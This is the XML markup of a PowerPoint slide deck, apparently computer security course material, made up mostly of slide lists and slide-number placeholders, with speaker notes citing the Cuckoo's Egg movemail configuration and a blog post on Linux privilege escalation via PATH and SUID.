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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="455" r:id="rId6"/>
    <p:sldId id="712" r:id="rId7"/>
    <p:sldId id="456" r:id="rId8"/>
    <p:sldId id="732" r:id="rId9"/>
    <p:sldId id="457" r:id="rId10"/>
    <p:sldId id="733" r:id="rId11"/>
    <p:sldId id="839" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="735" r:id="rId14"/>
    <p:sldId id="736" r:id="rId15"/>
    <p:sldId id="742" r:id="rId16"/>
    <p:sldId id="737" r:id="rId17"/>
    <p:sldId id="743" r:id="rId18"/>
    <p:sldId id="481" r:id="rId19"/>
    <p:sldId id="738" r:id="rId20"/>
    <p:sldId id="744" r:id="rId21"/>
    <p:sldId id="734" r:id="rId22"/>
    <p:sldId id="745" r:id="rId23"/>
    <p:sldId id="519" r:id="rId24"/>
    <p:sldId id="520" r:id="rId25"/>
    <p:sldId id="740" r:id="rId26"/>
    <p:sldId id="739" r:id="rId27"/>
    <p:sldId id="264" r:id="rId28"/>
    <p:sldId id="534" r:id="rId29"/>
    <p:sldId id="535" r:id="rId30"/>
    <p:sldId id="536" r:id="rId31"/>
    <p:sldId id="833" r:id="rId32"/>
    <p:sldId id="544" r:id="rId33"/>
    <p:sldId id="538" r:id="rId34"/>
    <p:sldId id="837" r:id="rId35"/>
    <p:sldId id="838" r:id="rId36"/>
    <p:sldId id="541" r:id="rId37"/>
    <p:sldId id="546" r:id="rId38"/>
    <p:sldId id="834" r:id="rId39"/>
    <p:sldId id="537" r:id="rId40"/>
    <p:sldId id="835" r:id="rId41"/>
    <p:sldId id="836" r:id="rId42"/>
    <p:sldId id="545" r:id="rId43"/>
    <p:sldId id="539" r:id="rId44"/>
    <p:sldId id="540" r:id="rId45"/>
    <p:sldId id="840" r:id="rId46"/>
    <p:sldId id="548" r:id="rId47"/>
    <p:sldId id="267" r:id="rId48"/>
    <p:sldId id="550" r:id="rId49"/>
    <p:sldId id="556" r:id="rId50"/>
    <p:sldId id="641" r:id="rId51"/>
    <p:sldId id="270" r:id="rId52"/>
    <p:sldId id="747" r:id="rId53"/>
    <p:sldId id="746" r:id="rId54"/>
    <p:sldId id="472" r:id="rId55"/>
    <p:sldId id="473" r:id="rId56"/>
    <p:sldId id="474" r:id="rId57"/>
    <p:sldId id="475" r:id="rId58"/>
    <p:sldId id="466" r:id="rId59"/>
    <p:sldId id="477" r:id="rId60"/>
    <p:sldId id="713" r:id="rId61"/>
    <p:sldId id="714" r:id="rId62"/>
    <p:sldId id="715" r:id="rId63"/>
    <p:sldId id="716" r:id="rId64"/>
    <p:sldId id="719" r:id="rId65"/>
    <p:sldId id="717" r:id="rId66"/>
    <p:sldId id="718" r:id="rId67"/>
    <p:sldId id="478" r:id="rId68"/>
    <p:sldId id="721" r:id="rId69"/>
    <p:sldId id="483" r:id="rId70"/>
    <p:sldId id="484" r:id="rId71"/>
    <p:sldId id="524" r:id="rId72"/>
    <p:sldId id="482" r:id="rId73"/>
    <p:sldId id="486" r:id="rId74"/>
    <p:sldId id="506" r:id="rId75"/>
    <p:sldId id="487" r:id="rId76"/>
    <p:sldId id="509" r:id="rId77"/>
    <p:sldId id="720" r:id="rId78"/>
    <p:sldId id="490" r:id="rId79"/>
    <p:sldId id="491" r:id="rId80"/>
    <p:sldId id="492" r:id="rId81"/>
    <p:sldId id="493" r:id="rId82"/>
    <p:sldId id="494" r:id="rId83"/>
    <p:sldId id="495" r:id="rId84"/>
    <p:sldId id="510" r:id="rId85"/>
    <p:sldId id="724" r:id="rId86"/>
    <p:sldId id="522" r:id="rId87"/>
    <p:sldId id="552" r:id="rId88"/>
    <p:sldId id="553" r:id="rId89"/>
    <p:sldId id="500" r:id="rId90"/>
    <p:sldId id="501" r:id="rId91"/>
    <p:sldId id="511" r:id="rId92"/>
    <p:sldId id="513" r:id="rId93"/>
    <p:sldId id="512" r:id="rId94"/>
    <p:sldId id="521" r:id="rId95"/>
    <p:sldId id="529" r:id="rId96"/>
    <p:sldId id="530" r:id="rId97"/>
    <p:sldId id="729" r:id="rId98"/>
    <p:sldId id="532" r:id="rId99"/>
    <p:sldId id="533" r:id="rId100"/>
    <p:sldId id="325" r:id="rId101"/>
    <p:sldId id="728" r:id="rId102"/>
    <p:sldId id="327" r:id="rId103"/>
    <p:sldId id="328" r:id="rId104"/>
    <p:sldId id="329" r:id="rId105"/>
    <p:sldId id="330" r:id="rId106"/>
    <p:sldId id="331" r:id="rId107"/>
    <p:sldId id="332" r:id="rId108"/>
    <p:sldId id="554" r:id="rId109"/>
    <p:sldId id="333" r:id="rId110"/>
    <p:sldId id="334" r:id="rId111"/>
    <p:sldId id="335" r:id="rId112"/>
    <p:sldId id="336" r:id="rId113"/>
    <p:sldId id="337" r:id="rId114"/>
    <p:sldId id="338" r:id="rId115"/>
    <p:sldId id="339" r:id="rId116"/>
    <p:sldId id="340" r:id="rId117"/>
    <p:sldId id="551" r:id="rId118"/>
    <p:sldId id="341" r:id="rId119"/>
    <p:sldId id="342" r:id="rId120"/>
    <p:sldId id="343" r:id="rId121"/>
    <p:sldId id="344" r:id="rId122"/>
    <p:sldId id="345" r:id="rId123"/>
    <p:sldId id="346" r:id="rId124"/>
    <p:sldId id="347" r:id="rId125"/>
    <p:sldId id="348" r:id="rId126"/>
    <p:sldId id="349" r:id="rId127"/>
    <p:sldId id="350" r:id="rId128"/>
    <p:sldId id="557" r:id="rId129"/>
    <p:sldId id="351" r:id="rId130"/>
    <p:sldId id="592" r:id="rId131"/>
    <p:sldId id="593" r:id="rId132"/>
    <p:sldId id="594" r:id="rId133"/>
    <p:sldId id="595" r:id="rId134"/>
    <p:sldId id="596" r:id="rId135"/>
    <p:sldId id="611" r:id="rId136"/>
    <p:sldId id="558" r:id="rId137"/>
    <p:sldId id="559" r:id="rId138"/>
    <p:sldId id="610" r:id="rId139"/>
    <p:sldId id="560" r:id="rId140"/>
    <p:sldId id="561" r:id="rId141"/>
    <p:sldId id="609" r:id="rId142"/>
    <p:sldId id="562" r:id="rId143"/>
    <p:sldId id="563" r:id="rId144"/>
    <p:sldId id="564" r:id="rId145"/>
    <p:sldId id="565" r:id="rId146"/>
    <p:sldId id="566" r:id="rId147"/>
    <p:sldId id="567" r:id="rId148"/>
    <p:sldId id="608" r:id="rId149"/>
    <p:sldId id="568" r:id="rId150"/>
    <p:sldId id="569" r:id="rId151"/>
    <p:sldId id="570" r:id="rId152"/>
    <p:sldId id="571" r:id="rId153"/>
    <p:sldId id="572" r:id="rId154"/>
    <p:sldId id="573" r:id="rId155"/>
    <p:sldId id="574" r:id="rId156"/>
    <p:sldId id="575" r:id="rId157"/>
    <p:sldId id="576" r:id="rId158"/>
    <p:sldId id="577" r:id="rId159"/>
    <p:sldId id="578" r:id="rId160"/>
    <p:sldId id="579" r:id="rId161"/>
    <p:sldId id="580" r:id="rId162"/>
    <p:sldId id="581" r:id="rId163"/>
    <p:sldId id="582" r:id="rId164"/>
    <p:sldId id="583" r:id="rId165"/>
    <p:sldId id="584" r:id="rId166"/>
    <p:sldId id="585" r:id="rId167"/>
    <p:sldId id="586" r:id="rId168"/>
    <p:sldId id="587" r:id="rId169"/>
    <p:sldId id="588" r:id="rId170"/>
    <p:sldId id="589" r:id="rId171"/>
    <p:sldId id="590" r:id="rId172"/>
    <p:sldId id="591" r:id="rId173"/>
    <p:sldId id="607" r:id="rId174"/>
    <p:sldId id="597" r:id="rId175"/>
    <p:sldId id="638" r:id="rId176"/>
    <p:sldId id="635" r:id="rId177"/>
    <p:sldId id="636" r:id="rId178"/>
    <p:sldId id="637" r:id="rId179"/>
    <p:sldId id="639" r:id="rId180"/>
    <p:sldId id="643" r:id="rId181"/>
    <p:sldId id="725" r:id="rId182"/>
    <p:sldId id="604" r:id="rId183"/>
    <p:sldId id="605" r:id="rId184"/>
    <p:sldId id="606" r:id="rId185"/>
    <p:sldId id="354" r:id="rId186"/>
    <p:sldId id="612" r:id="rId187"/>
    <p:sldId id="613" r:id="rId188"/>
    <p:sldId id="614" r:id="rId189"/>
    <p:sldId id="615" r:id="rId190"/>
    <p:sldId id="616" r:id="rId191"/>
    <p:sldId id="617" r:id="rId192"/>
    <p:sldId id="618" r:id="rId193"/>
    <p:sldId id="619" r:id="rId194"/>
    <p:sldId id="620" r:id="rId195"/>
    <p:sldId id="621" r:id="rId196"/>
    <p:sldId id="622" r:id="rId197"/>
    <p:sldId id="623" r:id="rId198"/>
    <p:sldId id="624" r:id="rId199"/>
    <p:sldId id="625" r:id="rId200"/>
    <p:sldId id="626" r:id="rId201"/>
    <p:sldId id="726" r:id="rId202"/>
    <p:sldId id="627" r:id="rId203"/>
    <p:sldId id="628" r:id="rId204"/>
    <p:sldId id="629" r:id="rId205"/>
    <p:sldId id="630" r:id="rId206"/>
    <p:sldId id="631" r:id="rId207"/>
    <p:sldId id="710" r:id="rId208"/>
    <p:sldId id="711" r:id="rId209"/>
    <p:sldId id="633" r:id="rId210"/>
    <p:sldId id="634" r:id="rId211"/>
    <p:sldId id="832" r:id="rId212"/>
    <p:sldId id="653" r:id="rId213"/>
    <p:sldId id="654" r:id="rId214"/>
    <p:sldId id="688" r:id="rId215"/>
    <p:sldId id="687" r:id="rId216"/>
    <p:sldId id="691" r:id="rId217"/>
    <p:sldId id="661" r:id="rId218"/>
    <p:sldId id="662" r:id="rId219"/>
    <p:sldId id="663" r:id="rId220"/>
    <p:sldId id="665" r:id="rId221"/>
    <p:sldId id="666" r:id="rId222"/>
    <p:sldId id="667" r:id="rId223"/>
    <p:sldId id="668" r:id="rId224"/>
    <p:sldId id="696" r:id="rId225"/>
    <p:sldId id="699" r:id="rId226"/>
    <p:sldId id="660" r:id="rId227"/>
    <p:sldId id="655" r:id="rId228"/>
    <p:sldId id="658" r:id="rId229"/>
    <p:sldId id="656" r:id="rId230"/>
    <p:sldId id="681" r:id="rId231"/>
    <p:sldId id="449" r:id="rId232"/>
    <p:sldId id="697" r:id="rId233"/>
    <p:sldId id="698" r:id="rId234"/>
    <p:sldId id="685" r:id="rId235"/>
    <p:sldId id="694" r:id="rId236"/>
    <p:sldId id="644" r:id="rId237"/>
    <p:sldId id="700" r:id="rId2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p:restoredTop sz="79048"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="133" d="100"/>
          <a:sy n="133" d="100"/>
        </p:scale>
        <p:origin x="1544"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332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9FC9B-74B5-8E40-A9E6-386E1D7938B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/21/24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540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32886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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movemail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> configuration of the Cuckoo’s Egg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3125540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3281618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www.prplbx.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/resources/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-privilege-escalation-with-path-variable-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-bit/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3125540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38216943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6693F-A9C2-A34A-8B75-C92F0DF93E52}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11315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15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589DC-D40D-5949-BE5B-363D7E189410}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113561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56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5C357-9C52-F04C-BE02-F248699357F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11376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76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35D9F-8422-9440-B1EF-ECDD725363A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11397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97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C16C8-F92F-3F4D-B118-51C6788CC8FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114176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176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738CF-359D-EE46-A2FE-507409A27A82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114381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38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C6258-C9B7-384F-9C48-758DC5D2FE42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114585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585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77F35-681B-AE48-960D-5318E45B4E4E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11806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806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8FC63-C28E-DE42-8F74-1EF2A7D0EDF3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11724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2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1E8060-D11E-9F46-BEB7-5BB3173F4724}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11745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45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4E7AA-CE59-7241-833E-74CB5FA3AB0C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr 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79384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311B3-679B-A842-A2C9-00D1801F6399}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11765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65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EACDB-B906-604F-9596-A356FFF83653}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11786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86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2582A-19E8-1F4D-B2E6-1BB396287E8A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98713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713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2AFF5-6917-A84F-B64A-C999F77C370C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10014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014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5B600-353B-F847-B869-B75CBF3BDC13}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10035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035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855BD-8DFD-0446-B339-8AA2D5736E5F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>185</a:t>
            </a:fld>
            <a:endParaRPr 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7A400-9464-A246-A8FD-341A0539CBB9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102400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2400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B2099-CB10-F447-AD2F-F4141DCD1ADB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158146" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115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7A35-9423-7A48-A7E2-6A7024257A73}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103424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3424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B3197-F8A7-EF45-8780-48ED4DDDC73D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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6D8B9-543B-D548-B07D-5D7D55BDA067}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>44</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7330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37639-0B8A-C34B-B268-B7BC03A98E9A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104038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038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50341-6726-4B41-BA79-1709C3FF5E3B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104243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24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BC575-FAD5-544E-BFA4-EB2031DCCB1C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10444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4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EC64F-7865-E840-8D46-962E474FC53C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10465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65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44CBD-8333-1040-A182-DB92073C855B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10485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85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34342-D9F7-894B-9C97-48D0AA1B6BED}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>195</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7AEFF-6F6D-D64A-B241-07009E522ECB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10506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06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FAAED-716C-1A48-9B39-85CCDBDFB540}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10547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47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82056-A24B-DC46-9706-0F1C41D4ABF0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105677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677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0E1BF8-FCEC-DE48-BF40-E7CD10D958B9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105881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88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CFF37-792C-D04D-97E6-B44DB70C7969}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>46</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73712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2DEEB-3841-F841-A394-D182B2149B49}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10608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08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2DEEB-3841-F841-A394-D182B2149B49}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10608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08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3E451-545C-704B-82A8-4E7537A3A6F4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10629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29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94041-1F1B-5A47-ACAF-A36A7B4F31DB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162242" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162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39A51-F68F-DB44-86A0-A479873F844B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>204</a:t>
            </a:fld>
            <a:endParaRPr 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AA16B-7E54-AE4F-8B76-FAEF718F98C5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>205</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92C71-5BC8-664B-9C36-2A8DB3D17AB9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>206</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8F9B2-4F83-B346-A2FF-E607E3CE705A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>209</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809B6-0721-B44F-93FE-4A3529BF3F18}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>210</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9A7DC-617D-7241-8731-AA38312809E9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>215</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124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1A4070E-5EB9-564E-AA70-CD0932C2E1FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393493896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2544A-444A-AC44-8626-EEBE420A2983}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>217</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440C3-8EE3-414C-B113-35DB18643036}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>218</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123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C5AF8-7899-C441-83F6-2BFFDD47B7A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>219</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ED802-6FF4-0040-AAD0-E52D23D938DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>220</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A6E57-249C-6844-AFF3-99296BF1A608}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>221</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
